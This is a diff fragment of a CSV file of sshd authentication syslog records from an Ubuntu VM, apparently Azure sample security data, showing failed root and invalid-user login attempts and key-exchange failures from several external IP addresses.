+3390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:35:42,UbuntuDevEnv,2019-06-28 06:35:42,auth,UbuntuDevEnv,info,Unable to negotiate with 54.153.127.240 port 45658: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth],111755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.153.127.2,45658,,
+3391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:37:33,UbuntuDevEnv,2019-06-28 06:37:33,auth,UbuntuDevEnv,info,Connection closed by 54.153.127.240 port 57244 [preauth],111997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.153.127.2,57244,,
+3392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:38:38,UbuntuDevEnv,2019-06-28 06:38:37,auth,UbuntuDevEnv,info,Unable to negotiate with 54.153.127.240 port 40532: no matching host key type found. Their offer: ssh-dss [preauth],112276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.153.127.2,40532,,
+3393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:59:19,UbuntuDevEnv,2019-06-28 06:59:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,122063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:59:21,UbuntuDevEnv,2019-06-28 06:59:20,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 56384 ssh2,122063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,56384,,
+3395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:59:22,UbuntuDevEnv,2019-06-28 06:59:22,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 56384 [preauth],122063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,56384,,authenticating
+3396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:09:09,UbuntuDevEnv,2019-06-28 07:09:09,auth,UbuntuDevEnv,info,Received disconnect from 139.59.44.60 port 46502:11: Bye Bye [preauth],124447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.44.6,46502,,
+3397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:09:09,UbuntuDevEnv,2019-06-28 07:09:09,auth,UbuntuDevEnv,info,Disconnected from 139.59.44.60 port 46502 [preauth],124447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.44.6,46502,,
+3398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 15:10:28,UbuntuDevEnv,2019-06-28 15:10:27,auth,UbuntuDevEnv,info,Unable to negotiate with 34.211.132.4 port 39184: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1 [preauth],101438,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,34.211.132.4,39184,,
+3399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 15:25:14,UbuntuDevEnv,2019-06-28 15:25:14,auth,UbuntuDevEnv,info,Did not receive identification string from 132.148.135.122 port 51050,104621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,132.148.135.1,51050,,
+3400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 17:11:08,UbuntuDevEnv,2019-06-28 17:11:07,auth,UbuntuDevEnv,info,Did not receive identification string from 92.118.161.49 port 51385,129209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,92.118.161.4,51385,,
+3401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:05:12,UbuntuDevEnv,2019-06-26 12:05:11,auth,UbuntuDevEnv,info,Invalid user juan from 27.106.45.6 port 36299,106676,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,juan,27.106.45.6,36299,,
+3402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:05:12,UbuntuDevEnv,2019-06-26 12:05:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,106676,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:05:12,UbuntuDevEnv,2019-06-26 12:05:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,106676,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:05:14,UbuntuDevEnv,2019-06-26 12:05:13,auth,UbuntuDevEnv,info,Failed password for invalid user juan from 27.106.45.6 port 36299 ssh2,106676,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,juan,27.106.45.6,36299,,
+3405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:05:14,UbuntuDevEnv,2019-06-26 12:05:13,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 36299:11: Bye Bye [preauth],106676,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,36299,,
+3406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:05:14,UbuntuDevEnv,2019-06-26 12:05:13,auth,UbuntuDevEnv,info,Disconnected from invalid user juan 27.106.45.6 port 36299 [preauth],106676,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,juan,27.106.45.6,36299,,
+3407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:07:55,UbuntuDevEnv,2019-06-26 12:07:55,auth,UbuntuDevEnv,info,Invalid user long from 27.106.45.6 port 49736,107249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,long,27.106.45.6,49736,,
+3408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:07:55,UbuntuDevEnv,2019-06-26 12:07:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,107249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:07:55,UbuntuDevEnv,2019-06-26 12:07:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,107249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:07:57,UbuntuDevEnv,2019-06-26 12:07:57,auth,UbuntuDevEnv,info,Failed password for invalid user long from 27.106.45.6 port 49736 ssh2,107249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,long,27.106.45.6,49736,,
+3411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:07:57,UbuntuDevEnv,2019-06-26 12:07:57,auth,UbuntuDevEnv,info,Disconnected from invalid user long 27.106.45.6 port 49736 [preauth],107249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,long,27.106.45.6,49736,,
+3412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:07:57,UbuntuDevEnv,2019-06-26 12:07:57,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 49736:11: Bye Bye [preauth],107249,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,49736,,
+3413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:09:40,UbuntuDevEnv,2019-06-26 12:09:39,auth,UbuntuDevEnv,info,Invalid user rong from 27.106.45.6 port 58175,107619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rong,27.106.45.6,58175,,
+3414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:09:40,UbuntuDevEnv,2019-06-26 12:09:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,107619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:09:40,UbuntuDevEnv,2019-06-26 12:09:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,107619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:09:41,UbuntuDevEnv,2019-06-26 12:09:41,auth,UbuntuDevEnv,info,Failed password for invalid user rong from 27.106.45.6 port 58175 ssh2,107619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rong,27.106.45.6,58175,,
+3417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:09:41,UbuntuDevEnv,2019-06-26 12:09:41,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 58175:11: Bye Bye [preauth],107619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,58175,,
+3418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:09:41,UbuntuDevEnv,2019-06-26 12:09:41,auth,UbuntuDevEnv,info,Disconnected from invalid user rong 27.106.45.6 port 58175 [preauth],107619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rong,27.106.45.6,58175,,
+3419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:11:17,UbuntuDevEnv,2019-06-26 12:11:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6  user=root,107957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,27.106.45.6,,0,
+3420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:11:18,UbuntuDevEnv,2019-06-26 12:11:18,auth,UbuntuDevEnv,info,Failed password for root from 27.106.45.6 port 38364 ssh2,107957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,38364,,
+3421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:11:19,UbuntuDevEnv,2019-06-26 12:11:18,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 38364:11: Bye Bye [preauth],107957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,38364,,
+3422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:11:19,UbuntuDevEnv,2019-06-26 12:11:18,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 27.106.45.6 port 38364 [preauth],107957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,27.106.45.6,38364,,
+3423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:12:55,UbuntuDevEnv,2019-06-26 12:12:54,auth,UbuntuDevEnv,info,Invalid user internet from 27.106.45.6 port 46785,108305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,internet,27.106.45.6,46785,,
+3424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:12:55,UbuntuDevEnv,2019-06-26 12:12:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,108305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:12:55,UbuntuDevEnv,2019-06-26 12:12:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,108305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:12:57,UbuntuDevEnv,2019-06-26 12:12:57,auth,UbuntuDevEnv,info,Failed password for invalid user internet from 27.106.45.6 port 46785 ssh2,108305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,internet,27.106.45.6,46785,,
+3427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:12:57,UbuntuDevEnv,2019-06-26 12:12:57,auth,UbuntuDevEnv,info,Disconnected from invalid user internet 27.106.45.6 port 46785 [preauth],108305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,internet,27.106.45.6,46785,,
+3428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:12:57,UbuntuDevEnv,2019-06-26 12:12:57,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 46785:11: Bye Bye [preauth],108305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,46785,,
+3429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:14:35,UbuntuDevEnv,2019-06-26 12:14:34,auth,UbuntuDevEnv,info,Invalid user orange from 27.106.45.6 port 55209,108655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,orange,27.106.45.6,55209,,
+3430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:14:35,UbuntuDevEnv,2019-06-26 12:14:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,108655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:14:35,UbuntuDevEnv,2019-06-26 12:14:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,108655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:14:37,UbuntuDevEnv,2019-06-26 12:14:37,auth,UbuntuDevEnv,info,Failed password for invalid user orange from 27.106.45.6 port 55209 ssh2,108655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,orange,27.106.45.6,55209,,
+3433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:14:37,UbuntuDevEnv,2019-06-26 12:14:37,auth,UbuntuDevEnv,info,Disconnected from invalid user orange 27.106.45.6 port 55209 [preauth],108655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,orange,27.106.45.6,55209,,
+3434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:14:37,UbuntuDevEnv,2019-06-26 12:14:37,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 55209:11: Bye Bye [preauth],108655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,55209,,
+3435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:16:15,UbuntuDevEnv,2019-06-26 12:16:15,auth,UbuntuDevEnv,info,Invalid user cantor from 27.106.45.6 port 35402,109099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cantor,27.106.45.6,35402,,
+3436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:16:15,UbuntuDevEnv,2019-06-26 12:16:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,109099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:16:15,UbuntuDevEnv,2019-06-26 12:16:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,109099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:16:17,UbuntuDevEnv,2019-06-26 12:16:17,auth,UbuntuDevEnv,info,Failed password for invalid user cantor from 27.106.45.6 port 35402 ssh2,109099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cantor,27.106.45.6,35402,,
+3439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:16:17,UbuntuDevEnv,2019-06-26 12:16:17,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 35402:11: Bye Bye [preauth],109099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,35402,,
+3440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:16:17,UbuntuDevEnv,2019-06-26 12:16:17,auth,UbuntuDevEnv,info,Disconnected from invalid user cantor 27.106.45.6 port 35402 [preauth],109099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cantor,27.106.45.6,35402,,
+3441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:17:55,UbuntuDevEnv,2019-06-26 12:17:55,auth,UbuntuDevEnv,info,Invalid user himanshu from 27.106.45.6 port 43824,109455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,27.106.45.6,43824,,
+3442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:17:55,UbuntuDevEnv,2019-06-26 12:17:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,109455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:17:55,UbuntuDevEnv,2019-06-26 12:17:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,109455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:17:57,UbuntuDevEnv,2019-06-26 12:17:57,auth,UbuntuDevEnv,info,Failed password for invalid user himanshu from 27.106.45.6 port 43824 ssh2,109455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,27.106.45.6,43824,,
+3445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:17:57,UbuntuDevEnv,2019-06-26 12:17:57,auth,UbuntuDevEnv,info,Disconnected from invalid user himanshu 27.106.45.6 port 43824 [preauth],109455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,27.106.45.6,43824,,
+3446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:17:57,UbuntuDevEnv,2019-06-26 12:17:57,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 43824:11: Bye Bye [preauth],109455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,43824,,
+3447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:19:38,UbuntuDevEnv,2019-06-26 12:19:38,auth,UbuntuDevEnv,info,Invalid user dbuser from 27.106.45.6 port 52260,109817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dbuser,27.106.45.6,52260,,
+3448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:19:38,UbuntuDevEnv,2019-06-26 12:19:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,109817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:19:38,UbuntuDevEnv,2019-06-26 12:19:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,109817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
